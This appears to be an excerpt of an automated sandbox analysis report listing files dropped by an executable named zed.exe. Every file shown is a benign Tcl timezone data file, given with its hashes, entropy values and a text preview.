                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Detroit) {.. {-9223372036854775808 -19931 0 LMT}.. {-2051202469 -21600 0 CST}.. {-1724083200 -18000 0 EST}.. {-883594800 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-757364400 -18000 0 EST}.. {-684349200 -14400 1 EDT}.. {-671047200 -18000 0 EST}.. {-80506740 -14400 0 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {94712400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {157784400 -18000 0 EST}.. {167814000 -14400 0 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                                            Entropy (8bit):4.86856578093135
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290TL3290ppv:MByMYbpwt290Tr290b
                                                                                                                                                                                                                                            MD5:398D8DBB24CEA2D174EF05F63869C94A
                                                                                                                                                                                                                                            SHA1:6D0E04165952E873E6ECA33A0E54761B747F0A98
                                                                                                                                                                                                                                            SHA-256:3DA98AA7D3085845779BE8ED6C93CCBDA92191F17CA67BBF779803E21DA2ABF3
                                                                                                                                                                                                                                            SHA-512:2652AFD1A3F8A4B84078A964005FE10C64491EC2D47CDE57D5066D07D1D837308FD696F53B9E7B6B0E72F86F9A85128B8CBF5F302F91EADE6D840DF946DE85CD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Dominica) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8600
                                                                                                                                                                                                                                            Entropy (8bit):3.8579895970456137
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:7SabOGaLm911sF7Lv/PCewtA8CzSPyDLbrcUia:7vf4lLv/PCenJzS6cy
                                                                                                                                                                                                                                            MD5:EBD169ECA4D45EED28BF7B27809361BC
                                                                                                                                                                                                                                            SHA1:E89C8484A29D792FB6349CFDFDD30C2FA6B78B6B
                                                                                                                                                                                                                                            SHA-256:026D51D73D30A3710288F440E0C337E44E3A14D0AA2D7B6C6E53AF43FC72A90C
                                                                                                                                                                                                                                            SHA-512:45C936ED7D4AF95261180547013454AAEC9FA7672B52AC6077DD99D9FEB6DDD57652FE4EC67BF81F1588384F3027A1872E0C72D9CAEB980B66D2CB6EE9B8ABB0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Edmonton) {.. {-9223372036854775808 -27232 0 LMT}.. {-1998663968 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1600614000 -21600 1 MDT}.. {-1596816000 -25200 0 MST}.. {-1567954800 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1536505200 -21600 1 MDT}.. {-1523203200 -25200 0 MST}.. {-1504450800 -21600 1 MDT}.. {-1491753600 -25200 0 MST}.. {-1473001200 -21600 1 MDT}.. {-1459699200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {136371600 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {167821200 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {23072
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1230
                                                                                                                                                                                                                                            Entropy (8bit):3.7989525000422963
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5OXUepdkZss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6w:5OXCZsMw57XJh4CxUF/A6GTrtSUUhfL0
                                                                                                                                                                                                                                            MD5:6766E75702D8C2D1C986DFCEFCE554F9
                                                                                                                                                                                                                                            SHA1:39553F80D82BC0134FAF70C9830B96BDCBCEFF1C
                                                                                                                                                                                                                                            SHA-256:48FC987E5999EA79F24797E0450FE4DAB7CF320DFAD7A47A8A1E037077EC42C9
                                                                                                                                                                                                                                            SHA-512:A812D0D4254BB0B7DB7AE116652D2A8F97D22C59F2709A17D1CE435FCFB38B807A4E0ED6EA114A66897E29D85226875FA84D28B254A5D17BD1CBA95FAD8349B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Eirunepe) {.. {-9223372036854775808 -16768 0 LMT}.. {-1767208832 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {571204800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):279
                                                                                                                                                                                                                                            Entropy (8bit):4.760311149376001
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/29078iPDm2OHvJ4YoHxHhgdrV/uF+IcmJ3/uF+ivNv:MB8629078AmdHx4YCJSB/uF+QV/uF+w9
                                                                                                                                                                                                                                            MD5:CEF7277443EB6990E72C7EA7F79A122C
                                                                                                                                                                                                                                            SHA1:1D3FEA364B3DC129DE3998A1455D5588EBAA6FF8
                                                                                                                                                                                                                                            SHA-256:C02C6E79398553BD07BEA0BE4B7F0EBDD8BC821595909CFFB49DE4290A0D1D0F
                                                                                                                                                                                                                                            SHA-512:E6FC530B2CCF010B8D38BC3F49A6859B5C68F4AB604E6305CE75FBE4FC9FF3FCD0187DEBEF6DAE652EEF9695568DBDE31F426E404CC3CC206D78183E0D919234
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/El_Salvador) {.. {-9223372036854775808 -21408 0 LMT}.. {-1546279392 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):190
                                                                                                                                                                                                                                            Entropy (8bit):4.836337676384058
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qfSfXHAIg20qfORL/2IAcGE7JM7QIAcGEqfBn:SlSWB9vsM3y7ekHAIgpeON/2907390eB
                                                                                                                                                                                                                                            MD5:005D9C0E50291616A727CFB74A9FD37E
                                                                                                                                                                                                                                            SHA1:846AE6720382B4F67B37B4256E45246C81DAF899
                                                                                                                                                                                                                                            SHA-256:3E363BF82545F24CCE8CFA6EEC97BA6E1C2A7730B2A9CE6C48F784821D308A5D
                                                                                                                                                                                                                                            SHA-512:452326D11D01825764BC40A77D17444D822F3AA202582233DD8B122798478FA83E3A27A02508EAC4CF0C7922AC2563742D773AA870562AE496B34FBB41FBAD63
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Ensenada) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4578
                                                                                                                                                                                                                                            Entropy (8bit):3.8944281193962818
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5QIgsB/YRRvkGZ+R64CjSUlTG5Al5pj/A1ZFCARCeQbvb5+:6IgzR864CjSETG5sjgZkR/bvt+
                                                                                                                                                                                                                                            MD5:4A4E023F635C4202018EA9E8F85B5047
                                                                                                                                                                                                                                            SHA1:38E121FE2D419413E9E791B6C22BFC8D9F7554BC
                                                                                                                                                                                                                                            SHA-256:AB15023807E7C7D1026C9970D190F1B405D48952464025242C2BB6C6BBB8391A
                                                                                                                                                                                                                                            SHA-512:F10D21A2C841224879D1C817FC7F477DF582E1BC3603666B55199C098D51D1D5429F8C088C1083C07FC7588AE5C42A1DFBCC6B7C636AD1BE84ED657807A229E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fort_Nelson) {.. {-9223372036854775808 -29447 0 LMT}.. {-2713880953 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):231
                                                                                                                                                                                                                                            Entropy (8bit):4.778858143786314
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/290HXYAp4903GK8:MByMY3GK7Kp3GKnt290Hz4903GK8
                                                                                                                                                                                                                                            MD5:24C369A3091452DCA7AAEBF4F48F5289
                                                                                                                                                                                                                                            SHA1:2C2174CB16F490689E6FAC17B6D18F4A0DBD2DC9
                                                                                                                                                                                                                                            SHA-256:C8948616262CF6990739343ABBBD237E572DB49310099E21DD8F9E317F7D11B3
                                                                                                                                                                                                                                            SHA-512:80F579572754579706B4EEA49BF30456F3231A308E0616DC430E2428A04992412773421542E4F7FE4E4C7491BA88942FA44B49E87E95A2183211AC2AB523B231
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Fort_Wayne) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1423
                                                                                                                                                                                                                                            Entropy (8bit):3.784027854102512
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5MeajcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaIBXR8nd:5rChlvEw6kSSx5H4a8tf3fkuoYVZDNRo
                                                                                                                                                                                                                                            MD5:E7939C9A3F83D73B82A6DE359365EFD4
                                                                                                                                                                                                                                            SHA1:06D6E257DA7C317CAFAF6C0B04567A2453CC1660
                                                                                                                                                                                                                                            SHA-256:C0A836BDAF07F0376B7B0833A0AB3D52BA6E3E1D6F95E247E1AD351CD1096066
                                                                                                                                                                                                                                            SHA-512:E2BEA04084489B26ADD9A768D2580C1FF7EBAC8A3EA36818F49E85FB14E01500D59D53904F5A17F4DABEF27B4CC2FC3F977EE4C125E5CE739BBE90C130ED3B07
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fortaleza) {.. {-9223372036854775808 -9240 0 LMT}.. {-1767216360 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8372
                                                                                                                                                                                                                                            Entropy (8bit):3.8225708746657316
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:w4lTPB10KvnpNWMPm4bPJWXtRbALtuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/BI:wKCC
                                                                                                                                                                                                                                            MD5:1C8B0B85BB5578E84A4867546111F946
                                                                                                                                                                                                                                            SHA1:E08A96F5B369FA53BC1F3F839EC14FF9D334F727
                                                                                                                                                                                                                                            SHA-256:58C207CBD9DE7A7BB15E48A62CEA9F15DA184B945133DEE88EFF29FD8B66B29E
                                                                                                                                                                                                                                            SHA-512:54CFBF208AB3E58AFB6BEC40265A452A3C4C684D7F278F51D6495FCA544652A1A5E05BC45F600911191B33C936E5D7D43A28FD2B0884AAB9F63B7AD5EFD574A1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Glace_Bay) {.. {-9223372036854775808 -14388 0 LMT}.. {-2131646412 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-536443200 -14400 0 AST}.. {-526500000 -10800 1 ADT}.. {-513198000 -14400 0 AST}.. {-504907200 -14400 0 AST}.. {63086400 -14400 0 AST}.. {73461600 -10800 1 ADT}.. {89182800 -14400 0 AST}.. {104911200 -10800 1 ADT}.. {120632400 -14400 0 AST}.. {126244800 -14400 0 AST}.. {136360800 -10800 1 ADT}.. {152082000 -14400 0 AST}.. {167810400 -10800 1 ADT}.. {183531600 -14400 0 AST}.. {199260000 -10800 1 ADT}.. {215586000 -14400 0 AST}.. {230709600 -10800 1 ADT}.. {247035600 -14400 0 AST}.. {262764000 -10800 1 ADT}.. {278485200 -14400 0 AST}.. {294213600 -10800 1 ADT}.. {309934800 -14400 0 AST}.. {325663200 -10800 1 ADT}
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.973070790103308
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0wQbSeyXHAIg20wQboAFARL/2IAcGE5GZJ4IAcGEH:SlSWB9vsM3y7lbSeSHAIgplbLFAN/291
                                                                                                                                                                                                                                            MD5:8263D2B39C2EC3B38A179F8BAD5972DD
                                                                                                                                                                                                                                            SHA1:18D3462F6846768E16036E860DE90FB345C93047
                                                                                                                                                                                                                                            SHA-256:5FB2CFBA25CE2F49D4C3911AFF8E7E1FF84EFC2D01F5783772E88246BFBC56AC
                                                                                                                                                                                                                                            SHA-512:C175CAF972459759553001D48921268E9C6268CED56021BA6339F8CE3DD032DA6180E2B82974D3DCD0DC5F21566DFDBFBE1B6CF24E5E893F2335A449452DB27F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Nuuk)]} {.. LoadTimeZoneFile America/Nuuk..}..set TZData(:America/Godthab) $TZData(:America/Nuuk)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10353
                                                                                                                                                                                                                                            Entropy (8bit):3.864463676759425
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:zfSacO8f7/ewzlrfFj18KvnpNWMPm4bPJvSuYUHgA0G19OBYEi/B51B7/Bm6BTdW:zfSacOI7/V3SuYUHgAuCC
                                                                                                                                                                                                                                            MD5:0D646C67105FD0525E7CCC79585CE9DF
                                                                                                                                                                                                                                            SHA1:06D91FDD8FEEDC299E40079569372F97A9AC6F04
                                                                                                                                                                                                                                            SHA-256:52D2478289682BF95BFB93D64D679E888C9D23C0F68DFFF7E6E34BFC44B3D892
                                                                                                                                                                                                                                            SHA-512:FD672613C2B65E12425415630A2F489917EB80DDED41338C9AA7D5D3C6B54E52C516A32493593F518DACF22A91D7A9D2C96DB9C5F1BE2C3BB9842D274BDC04FF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Goose_Bay) {.. {-9223372036854775808 -14500 0 LMT}.. {-2713895900 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1096921748 -12600 0 NST}.. {-1072989000 -12600 0 NST}.. {-1061670600 -9000 1 NDT}.. {-1048973400 -12600 0 NST}.. {-1030221000 -9000 1 NDT}.. {-1017523800 -12600 0 NST}.. {-998771400 -9000 1 NDT}.. {-986074200 -12600 0 NST}.. {-966717000 -9000 1 NDT}.. {-954624600 -12600 0 NST}.. {-935267400 -9000 1 NDT}.. {-922570200 -12600 0 NST}.. {-903817800 -9000 1 NDT}.. {-891120600 -12600 0 NST}.. {-872368200 -9000 0 NWT}.. {-769395600 -9000 1 NPT}.. {-765401400 -12600 0 NST}.. {-757369800 -12600 0 NST}.. {-746044200 -9000 1 NDT}.. {-733347000 -12600 0 NST}.. {-714594600 -9000 1 NDT}.. {-701897400 -12600 0 NST}.. {-683145000 -9000 1 NDT}.. {-67044
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7522
                                                                                                                                                                                                                                            Entropy (8bit):3.84007813579738
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:pGStCt/cL1BRv0HY2iU7KKdFL6Aa2K4gSLf8e:pvItOx0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:A17723CE27EC99D1506C45AB1531085B
                                                                                                                                                                                                                                            SHA1:A83ED7BD09514A829CC8F2EA47BA113F5DCA1090
                                                                                                                                                                                                                                            SHA-256:560B39485CED4C2A0E85A66EB875331E5879104187D92CB7F05C2F635E34AC99
                                                                                                                                                                                                                                            SHA-512:110D1253D6915DB046247E4FD3BA9B881146BC3896DE779215E0CC6D1DCC59958C355441955509F5D38E3A3BA166DFD0F2F277000E9E89D6551FBEA0C16974B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Grand_Turk) {.. {-9223372036854775808 -17072 0 LMT}.. {-2524504528 -18430 0 KMT}.. {-1827687170 -18000 0 EST}.. {284014800 -18000 0 EST}.. {294217200 -14400 1 EDT}.. {309938400 -18000 0 EST}.. {325666800 -14400 1 EDT}.. {341388000 -18000 0 EST}.. {357116400 -14400 1 EDT}.. {372837600 -18000 0 EST}.. {388566000 -14400 1 EDT}.. {404892000 -18000 0 EST}.. {420015600 -14400 1 EDT}.. {436341600 -18000 0 EST}.. {452070000 -14400 1 EDT}.. {467791200 -18000 0 EST}.. {483519600 -14400 1 EDT}.. {499240800 -18000 0 EST}.. {514969200 -14400 1 EDT}.. {530690400 -18000 0 EST}.. {544604400 -14400 1 EDT}.. {562140000 -18000 0 EST}.. {576054000 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607503600 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638953200 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671007600 -14400 1 EDT}.. {688543200 -18000 0 EST}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.892013473075135
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905Qb90ppv:MByMYbpwt290Ob90b
                                                                                                                                                                                                                                            MD5:4B9ABEA103F55509550F8B42D88E84B7
                                                                                                                                                                                                                                            SHA1:E3AA1BCE5E260264E74F77E59C4071B7E496AB41
                                                                                                                                                                                                                                            SHA-256:EBED070E8E67C5F12FF6E03FE508BE90789F17C793DFE61237B4045B8222580F
                                                                                                                                                                                                                                            SHA-512:568E375464FF264C5048CB35995945BDE1D5BCC3A108B2A4D0F8389EBF18B4C58EBB1C2122F10BA777D512504A59C7EFDF6069EABD2A5DEA3189204B7F7A6EB4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Grenada) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.9138787435596765
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905AJLr490ppv:MByMYbpwt290qJLr490b
                                                                                                                                                                                                                                            MD5:92B091A06198E233B73DF12DFCD818D5
                                                                                                                                                                                                                                            SHA1:C529488D09F86755E4F22CB4F0E3013C3A1B978D
                                                                                                                                                                                                                                            SHA-256:6CB1930532831D12057FCB484C60DB64A60A4F6D8195DAFD464826923116A294
                                                                                                                                                                                                                                            SHA-512:55EAE03CDECAC43BEDD3AA1A32C632A46808F29FF4D97A330F818544E4D10B9E9BA909D6627C38065EB7AC8E2C395FA37797F532CCFC8AB89D4698CCDE17F985
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Guadeloupe) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):399
                                                                                                                                                                                                                                            Entropy (8bit):4.513185345162455
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862906GGmdHKznC972f/uF+mP/uF+K67Jqd3/uF+eBxE/uF+DAWNv:5neQCgfS+6S+K67Yd3S+e0S+1
                                                                                                                                                                                                                                            MD5:569CDE7CE1AB84C0F16A25E85A418334
                                                                                                                                                                                                                                            SHA1:EADE79AB6EDD98C7FE8B10B480C5C530CA014F5C
                                                                                                                                                                                                                                            SHA-256:14F6A98D602F3648C816B110F3A0BA375E1FFE8FA06BEEAB419DC1ABFA6EDCAF
                                                                                                                                                                                                                                            SHA-512:AE2ACBF09EED857906811BE2984D6BF92BF2955A9FE2F9F3FFEBB6790902F5C2C870F8561CA13AD9CB7826EECA434BED7CFE7D0D2739996BACEE506D0EB730DC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guatemala) {.. {-9223372036854775808 -21724 0 LMT}.. {-1617040676 -21600 0 CST}.. {123055200 -18000 1 CDT}.. {130914000 -21600 0 CST}.. {422344800 -18000 1 CDT}.. {433054800 -21600 0 CST}.. {669708000 -18000 1 CDT}.. {684219600 -21600 0 CST}.. {1146376800 -18000 1 CDT}.. {1159678800 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):249
                                                                                                                                                                                                                                            Entropy (8bit):4.745656594295655
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2905xDm2OHHjGeoHv5laITicKpKV0EX/uFhfF/KVg:MB86290jmdHHLCv5FT/gOR/uFpF/Og
                                                                                                                                                                                                                                            MD5:DF661E312C6CE279CD6829120BE33CF2
                                                                                                                                                                                                                                            SHA1:4ACDB31E27EF9175C5452BF95F94F9BC280A237F
                                                                                                                                                                                                                                            SHA-256:6806AA5814BDC679C6EF653C518D2699114BE71D973F49C0864F622038DC2048
                                                                                                                                                                                                                                            SHA-512:04E7FD01F4DAD981EE8A02487F4A889015C41D07D6DCF420183D387E2188FF3239E345B5D65FB195CA485F5C7B4AD8CFEF51FFFC11EE0C91F0C88FF7B7EF17C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guayaquil) {.. {-9223372036854775808 -19160 0 LMT}.. {-2524502440 -18840 0 QMT}.. {-1230749160 -18000 0 -05}.. {722926800 -14400 1 -05}.. {728884800 -18000 0 -05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
